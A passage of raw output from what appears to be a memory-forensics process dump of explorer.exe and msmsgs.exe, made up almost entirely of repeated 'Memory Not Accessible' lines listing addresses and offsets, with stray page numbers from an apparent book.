Memory Not Accessible: Virtual Address: 0x41c000 File Offset: 0x1c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x41d000 File Offset: 0x1d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x41e000 File Offset: 0x1e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x41f000 File Offset: 0x1f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x420000 File Offset: 0x20000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x422000 File Offset: 0x22000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x424000 File Offset: 0x24000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x425000 File Offset: 0x25000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x426000 File Offset: 0x26000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x427000 File Offset: 0x27000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x429000 File Offset: 0x29000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x42a000 File Offset: 0x2a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x42b000 File Offset: 0x2b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x42c000 File Offset: 0x2c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x42d000 File Offset: 0x2d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x42e000 File Offset: 0x2e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x42f000 File Offset: 0x2f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x430000 File Offset: 0x30000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x431000 File Offset: 0x31000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x432000 File Offset: 0x32000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x43a000 File Offset: 0x3a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x43b000 File Offset: 0x3b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x43f000 File Offset: 0x3f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x442000 File Offset: 0x42000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x445000 File Offset: 0x45000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x446000 File Offset: 0x46000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x447000 File Offset: 0x47000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x448000 File Offset: 0x48000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x449000 File Offset: 0x49000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x44c000 File Offset: 0x4c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x44d000 File Offset: 0x4d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x44e000 File Offset: 0x4e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x44f000 File Offset: 0x4f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x450000 File Offset: 0x50000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x453000 File Offset: 0x53000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x454000 File Offset: 0x54000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x456000 File Offset: 0x56000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x457000 File Offset: 0x57000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x458000 File Offset: 0x58000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x459000 File Offset: 0x59000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x45a000 File Offset: 0x5a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x45b000 File Offset: 0x5b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x463000 File Offset: 0x63000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x464000 File Offset: 0x64000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x465000 File Offset: 0x65000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x466000 File Offset: 0x66000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x467000 File Offset: 0x67000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x469000 File Offset: 0x69000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x46b000 File Offset: 0x6b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x470000 File Offset: 0x70000 Size: 0x1000 ************************************************************************ Dumping explorer.exe, pid: 1656 output: executable.1656.exe Memory Not Accessible: Virtual Address: 0x1022000 File Offset: 0x22000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1027000 File Offset: 0x27000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x102c000 File Offset: 0x29000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x102d000 File Offset: 0x2a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x102e000 File Offset: 0x2b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1030000 File Offset: 0x2d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1031000 File Offset: 0x2e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1032000 File Offset: 0x2f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1033000 File Offset: 0x30000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x103c000 File Offset: 0x37000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x103d000 File Offset: 0x38000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1046000 File Offset: 0x40000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1047000 File Offset: 0x41000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1048000 File Offset: 0x42000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1049000 File Offset: 0x43000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x104a000 File Offset: 0x44000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x104b000 File Offset: 0x45000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x104c000 File Offset: 0x46000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x104d000 File Offset: 0x47000 Size: 0x1000 123

Memory Not Accessible: Virtual Address: 0x104e000 File Offset: 0x48000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x104f000 File Offset: 0x49000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1050000 File Offset: 0x4a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1051000 File Offset: 0x4b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1052000 File Offset: 0x4c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1053000 File Offset: 0x4d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1054000 File Offset: 0x4e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1055000 File Offset: 0x4f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1056000 File Offset: 0x50000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1057000 File Offset: 0x51000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1058000 File Offset: 0x52000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1059000 File Offset: 0x53000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x105a000 File Offset: 0x54000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x105b000 File Offset: 0x55000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x105c000 File Offset: 0x56000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x105d000 File Offset: 0x57000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x105e000 File Offset: 0x58000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x105f000 File Offset: 0x59000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1060000 File Offset: 0x5a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1061000 File Offset: 0x5b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1062000 File Offset: 0x5c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1063000 File Offset: 0x5d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1064000 File Offset: 0x5e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1065000 File Offset: 0x5f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1066000 File Offset: 0x60000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1067000 File Offset: 0x61000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1068000 File Offset: 0x62000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1069000 File Offset: 0x63000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x106a000 File Offset: 0x64000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x106b000 File Offset: 0x65000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x106c000 File Offset: 0x66000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x106d000 File Offset: 0x67000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x106e000 File Offset: 0x68000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x106f000 File Offset: 0x69000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1070000 File Offset: 0x6a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1071000 File Offset: 0x6b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1072000 File Offset: 0x6c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1073000 File Offset: 0x6d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1074000 File Offset: 0x6e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1075000 File Offset: 0x6f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1076000 File Offset: 0x70000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1077000 File Offset: 0x71000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1078000 File Offset: 0x72000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1079000 File Offset: 0x73000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x107a000 File Offset: 0x74000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x107b000 File Offset: 0x75000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x107c000 File Offset: 0x76000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x107d000 File Offset: 0x77000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x107e000 File Offset: 0x78000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x107f000 File Offset: 0x79000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1080000 File Offset: 0x7a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1081000 File Offset: 0x7b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1082000 File Offset: 0x7c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1083000 File Offset: 0x7d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1084000 File Offset: 0x7e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1085000 File Offset: 0x7f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1086000 File Offset: 0x80000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1087000 File Offset: 0x81000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1088000 File Offset: 0x82000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1089000 File Offset: 0x83000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x108a000 File Offset: 0x84000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x108b000 File Offset: 0x85000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x108c000 File Offset: 0x86000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x108d000 File Offset: 0x87000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x108e000 File Offset: 0x88000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x108f000 File Offset: 0x89000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1090000 File Offset: 0x8a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1091000 File Offset: 0x8b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1092000 File Offset: 0x8c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1093000 File Offset: 0x8d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1094000 File Offset: 0x8e000 Size: 0x1000 124

Memory Not Accessible: Virtual Address: 0x1095000 File Offset: 0x8f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1096000 File Offset: 0x90000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1097000 File Offset: 0x91000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1098000 File Offset: 0x92000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x1099000 File Offset: 0x93000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x109a000 File Offset: 0x94000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x109b000 File Offset: 0x95000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x109c000 File Offset: 0x96000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x109d000 File Offset: 0x97000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x109e000 File Offset: 0x98000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x109f000 File Offset: 0x99000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10a0000 File Offset: 0x9a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10a1000 File Offset: 0x9b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10a2000 File Offset: 0x9c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10a3000 File Offset: 0x9d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10a4000 File Offset: 0x9e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10a5000 File Offset: 0x9f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10a6000 File Offset: 0xa0000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10a7000 File Offset: 0xa1000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10a8000 File Offset: 0xa2000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10a9000 File Offset: 0xa3000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10aa000 File Offset: 0xa4000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10ab000 File Offset: 0xa5000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10ac000 File Offset: 0xa6000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10ad000 File Offset: 0xa7000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10ae000 File Offset: 0xa8000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10af000 File Offset: 0xa9000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10b0000 File Offset: 0xaa000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10b1000 File Offset: 0xab000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10b2000 File Offset: 0xac000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10b3000 File Offset: 0xad000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10b4000 File Offset: 0xae000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10b5000 File Offset: 0xaf000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10b6000 File Offset: 0xb0000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10b7000 File Offset: 0xb1000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10b8000 File Offset: 0xb2000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10b9000 File Offset: 0xb3000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10ba000 File Offset: 0xb4000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10bb000 File Offset: 0xb5000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10bc000 File Offset: 0xb6000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10bd000 File Offset: 0xb7000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10be000 File Offset: 0xb8000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10bf000 File Offset: 0xb9000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10c0000 File Offset: 0xba000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10c1000 File Offset: 0xbb000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10c2000 File Offset: 0xbc000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10c3000 File Offset: 0xbd000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10c4000 File Offset: 0xbe000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10c5000 File Offset: 0xbf000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10c6000 File Offset: 0xc0000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10c7000 File Offset: 0xc1000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10c8000 File Offset: 0xc2000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10c9000 File Offset: 0xc3000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10ca000 File Offset: 0xc4000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10cb000 File Offset: 0xc5000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10cc000 File Offset: 0xc6000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10cd000 File Offset: 0xc7000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10ce000 File Offset: 0xc8000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10cf000 File Offset: 0xc9000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10d0000 File Offset: 0xca000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10d1000 File Offset: 0xcb000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10d2000 File Offset: 0xcc000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10d3000 File Offset: 0xcd000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10d4000 File Offset: 0xce000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10d5000 File Offset: 0xcf000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10d6000 File Offset: 0xd0000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10d7000 File Offset: 0xd1000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10d8000 File Offset: 0xd2000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10d9000 File Offset: 0xd3000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10da000 File Offset: 0xd4000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10db000 File Offset: 0xd5000 Size: 0x1000 125

Memory Not Accessible: Virtual Address: 0x10dc000 File Offset: 0xd6000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10dd000 File Offset: 0xd7000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10de000 File Offset: 0xd8000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10df000 File Offset: 0xd9000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10e0000 File Offset: 0xda000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10e1000 File Offset: 0xdb000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10e2000 File Offset: 0xdc000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10e3000 File Offset: 0xdd000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10e4000 File Offset: 0xde000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10e5000 File Offset: 0xdf000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10e6000 File Offset: 0xe0000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10e7000 File Offset: 0xe1000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10e8000 File Offset: 0xe2000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10e9000 File Offset: 0xe3000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10ea000 File Offset: 0xe4000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10eb000 File Offset: 0xe5000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10ec000 File Offset: 0xe6000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10ed000 File Offset: 0xe7000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10ee000 File Offset: 0xe8000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10ef000 File Offset: 0xe9000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10f0000 File Offset: 0xea000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10f2000 File Offset: 0xeb000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10f3000 File Offset: 0xec000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10f4000 File Offset: 0xed000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10f5000 File Offset: 0xee000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x10f6000 File Offset: 0xef000 Size: 0x1000 ************************************************************************ Dumping msmsgs.exe, pid: 792 output: executable.792.exe Memory Not Accessible: Virtual Address: 0x404000 File Offset: 0x4000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x405000 File Offset: 0x5000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x408000 File Offset: 0x8000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x409000 File Offset: 0x9000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x40a000 File Offset: 0xa000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x40c000 File Offset: 0xc000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x40e000 File Offset: 0xe000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x40f000 File Offset: 0xf000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x410000 File Offset: 0x10000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x412000 File Offset: 0x12000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x413000 File Offset: 0x13000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x414000 File Offset: 0x14000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x415000 File Offset: 0x15000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x416000 File Offset: 0x16000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x417000 File Offset: 0x17000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x418000 File Offset: 0x18000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x419000 File Offset: 0x19000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x41a000 File Offset: 0x1a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x41b000 File Offset: 0x1b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x41c000 File Offset: 0x1c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x41d000 File Offset: 0x1d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x41e000 File Offset: 0x1e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x41f000 File Offset: 0x1f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x420000 File Offset: 0x20000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x421000 File Offset: 0x21000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x422000 File Offset: 0x22000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x423000 File Offset: 0x23000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x424000 File Offset: 0x24000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x428000 File Offset: 0x28000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x429000 File Offset: 0x29000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x42c000 File Offset: 0x2c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x42d000 File Offset: 0x2d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x42e000 File Offset: 0x2e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x430000 File Offset: 0x30000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x432000 File Offset: 0x32000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x433000 File Offset: 0x33000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x434000 File Offset: 0x34000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x435000 File Offset: 0x35000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x436000 File Offset: 0x36000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x437000 File Offset: 0x37000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x438000 File Offset: 0x38000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x439000 File Offset: 0x39000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x43a000 File Offset: 0x3a000 Size: 0x1000 126

Memory Not Accessible: Virtual Address: 0x43b000 File Offset: 0x3b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x43c000 File Offset: 0x3c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x43d000 File Offset: 0x3d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x43e000 File Offset: 0x3e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x444000 File Offset: 0x44000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x445000 File Offset: 0x45000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x446000 File Offset: 0x46000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x447000 File Offset: 0x47000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x44a000 File Offset: 0x4a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x44b000 File Offset: 0x4b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x44c000 File Offset: 0x4c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x44d000 File Offset: 0x4d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x44e000 File Offset: 0x4e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x44f000 File Offset: 0x4f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x450000 File Offset: 0x50000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x452000 File Offset: 0x51000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x453000 File Offset: 0x52000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x454000 File Offset: 0x53000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x455000 File Offset: 0x54000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x456000 File Offset: 0x55000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x457000 File Offset: 0x56000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x458000 File Offset: 0x57000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x459000 File Offset: 0x58000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x45a000 File Offset: 0x59000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x45b000 File Offset: 0x5a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x45c000 File Offset: 0x5b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x45d000 File Offset: 0x5c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x45e000 File Offset: 0x5d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x45f000 File Offset: 0x5e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x460000 File Offset: 0x5f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x461000 File Offset: 0x60000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x462000 File Offset: 0x61000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x463000 File Offset: 0x62000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x464000 File Offset: 0x63000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x465000 File Offset: 0x64000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x466000 File Offset: 0x65000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x467000 File Offset: 0x66000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x468000 File Offset: 0x67000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x469000 File Offset: 0x68000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x46a000 File Offset: 0x69000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x46b000 File Offset: 0x6a000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x46c000 File Offset: 0x6b000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x46d000 File Offset: 0x6c000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x46e000 File Offset: 0x6d000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x46f000 File Offset: 0x6e000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x470000 File Offset: 0x6f000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x471000 File Offset: 0x70000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x472000 File Offset: 0x71000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x473000 File Offset: 0x72000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x474000 File Offset: 0x73000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x475000 File Offset: 0x74000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x476000 File Offset: 0x75000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x477000 File Offset: 0x76000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x478000 File Offset: 0x77000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x479000 File Offset: 0x78000 Size: 0x1000 Memory Not Accessible: Virtual Address: 0x47a000 File Offset: 